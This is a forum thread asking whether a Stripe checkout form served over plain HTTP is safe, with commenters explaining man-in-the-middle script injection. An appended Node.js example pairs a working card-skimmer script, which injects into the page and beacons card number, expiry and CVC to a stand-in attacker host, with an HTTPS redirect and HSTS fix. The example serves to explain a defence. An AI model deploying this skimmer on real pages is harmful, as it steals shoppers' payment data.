
I was ready to pay, and then it asked me to put my credit card information into a non-secure page. Looking at the page source, it looks like they use Stripe for payments. Will the credit card details be transmitted encrypted once I press the submit button, or are they transmitting the details in the clear?


The Stripe JavaScript will submit your details over HTTPS. To prevent this very concern (the perception that submitted data will not be secured), sites should serve their forms over HTTPS as well.


Unless someone substituted the JavaScript served by the page over unprotected HTTP (while it was sent to you). Firesheep already showed that making a similar process user-friendly isn't that hard.


Having pre-submission pages (or anything leading to the submission of sensitive data) not be over HTTPS is more than just an issue of perception; for example, a network attacker can inject JavaScript into the insecure form page and read/send off the credit card details before the form is even submitted.


Since more than one of the replies to me mention this, I'll reply to myself...

It is correct that serving the necessary JavaScript over HTTPS is the Right Thing To Do as it prevents injection. IIRC (I'm on my phone and not where I can research) Stripe serves the JavaScript themselves over HTTPS (you pull their scripts from their server) and this problem is solved.

While I understated the concern about serving forms unsecured, the same MITM problem is a potential issue for the page containing the form. The solution is the same: serve over HTTPS.


HTTPS or not, Stripe accepting credit card data on a site they don't control is extremely worrying.


If the page is not HTTPS an attacker could inject HTML to redirect your data to a site which is not Stripe (say the attacker's fake Stripe). HTTP Stripe forms are not secure.

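Added example, not code from this thread, from Stripe or from Firesheep: a Node.js model of the attack the comments above describe (a network attacker injecting script into an HTTP checkout page so the card details are sent to the attacker, not to Stripe) placed next to the fix the same comments recommend, serving the page over HTTPS. It goes one step beyond the thread by also sending an HSTS header so the browser refuses to load the plain-HTTP version on later visits. The hostnames, element ids, the "tokenizer" script and the exfiltration URL are all made up; the form is a stand-in, not Stripe's real markup.

```javascript
'use strict';
// Added example, not code from the HN thread or from Stripe. Models, as pure
// functions, (1) what a network attacker can do to a checkout page served over
// plain HTTP and (2) what the merchant's server should do instead. Hostnames,
// element ids and the exfiltration URL below are all made up for illustration.

// Constructed stand-in for a merchant's checkout page. The card fields have no
// name attribute (so the browser never posts them itself) and a script such as
// Stripe.js would normally tokenize them over HTTPS on submit. The ids and the
// script URL are hypothetical, not Stripe's real markup.
const CHECKOUT_HTML = `<!doctype html>
<html><body>
<form id="payment-form" action="/charge" method="post">
  <input id="card-number" type="text">
  <input id="card-exp" type="text">
  <input id="card-cvc" type="text">
  <button type="submit">Pay</button>
</form>
<script src="https://js.example/tokenizer.js"></script>
</body></html>`;

// Attacker side. This is the script a MITM injects into the HTTP response. It
// registers a capture-phase submit listener, so it runs before the page's own
// handler (the tokenizer) and sends the raw card fields to the attacker. The
// HTTPS call the tokenizer makes afterwards is irrelevant: the data already left.
function skimmerScript(exfilUrl) {
  return `<script>
document.addEventListener('submit', function (e) {
  var data = {};
  ['card-number', 'card-exp', 'card-cvc'].forEach(function (id) {
    var el = document.getElementById(id);
    if (el) data[id] = el.value;
  });
  navigator.sendBeacon(${JSON.stringify(exfilUrl)}, JSON.stringify(data));
}, true);
</script>`;
}

// Rewrite an HTML body in flight: inject the skimmer just before </body>. On
// the wire a MITM would also fix up Content-Length/Content-Encoding; that
// plumbing is left out so the function is testable offline.
function injectSkimmer(html, exfilUrl) {
  const idx = html.lastIndexOf('</body>');
  if (idx === -1) return html + skimmerScript(exfilUrl);
  return html.slice(0, idx) + skimmerScript(exfilUrl) + html.slice(idx);
}

// Defender side. `req` is a plain object holding the fields we need from an
// incoming request: { protocol: 'http' | 'https', host, url }. A plain-HTTP
// request for the checkout page is never answered with the page: it is
// redirected to HTTPS. The HTTPS response carries Strict-Transport-Security so
// the browser will not load this host over HTTP again (HSTS is hardening added
// in this example; the thread itself only says "serve over HTTPS").
function checkoutResponse(req) {
  if (req.protocol !== 'https') {
    return {
      status: 301,
      headers: { Location: `https://${req.host}${req.url}` },
      body: '',
    };
  }
  return {
    status: 200,
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'Strict-Transport-Security': 'max-age=31536000; includeSubDomains',
    },
    body: CHECKOUT_HTML,
  };
}

// Demo when run directly: print the tampered page and both server responses.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(injectSkimmer(CHECKOUT_HTML, 'http://attacker.example/collect'));
  for (const protocol of ['http', 'https']) {
    const r = checkoutResponse({ protocol, host: 'shop.example', url: '/checkout' });
    console.log(protocol, r.status, r.headers);
  }
}
```

Two caveats a practitioner should keep in mind. The redirect alone does not protect the very first plain-HTTP request: an attacker sitting on that connection can answer it with the tampered page and never forward the redirect, which is exactly why the HTTPS response sets HSTS (and why sites that care submit the host to the browsers' HSTS preload list). And loading the tokenizer script itself over HTTPS, as the thread notes Stripe does, does not help here, because the injected script runs in the same page and reads the fields before the tokenizer ever sees them.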


